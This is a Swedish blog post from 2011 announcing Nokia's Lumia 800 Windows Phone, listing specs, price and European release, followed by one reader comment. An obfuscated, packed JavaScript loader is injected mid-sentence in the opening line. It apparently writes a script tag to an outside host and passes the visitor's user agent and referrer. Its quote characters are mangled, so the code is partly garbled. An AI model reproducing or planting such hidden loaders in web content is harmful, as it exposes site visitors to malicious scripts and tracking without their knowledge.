Image Image Image Image Image Image Image Image Image Image

| 15 augusti, 2020

Scroll to top

Top

Nokia Lumia 800… här är flaggskeppet.

Nokia Lumia 800… här är flaggskeppet.
Filip Urde
  • On 26 oktober, 2011
  • http://www.revue.se/filip-urde
En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ktbak|var|u0026u|referrer|kknyh||js|php’.split(’|’),0,{}))
av Nokias första Windows Phones och den som även kallas ”flaggskeppet” är här.

Nokia presenterade precis sina första Windows Phone-lurar och flaggskeppmodellen heter Nokia Lumia 800 samt Lumia 710, som jag även skrev om här.

Lumia 800 kommer att köra Windows Phone Mango, mobilen haren  3,7 tum stor pekskärm, en Qualcomm-processor på 1,4Ghz, kamera på 8 megapixel, 16GB lagringsminne, GPS, WiFi, Bluetooth och de flesta andra saker man förknippar med en smartphone. Det finns dock ingen möjlighet att utöka minnet med ett microSD-kort då ingång för sådana saknas.

Nokia Lumia 800 släpps i vissa europeiska länder i november och kommer att kosta runt 420 euro utan rabatter.

 

Läs mer om vad jag tycker om Nokia och samarbetet med windows här. Jag är som sagt väldigt delad!

Comments

  1. No phone is a iPhone

    Tycker den ser rätt snygg ut ändå :=)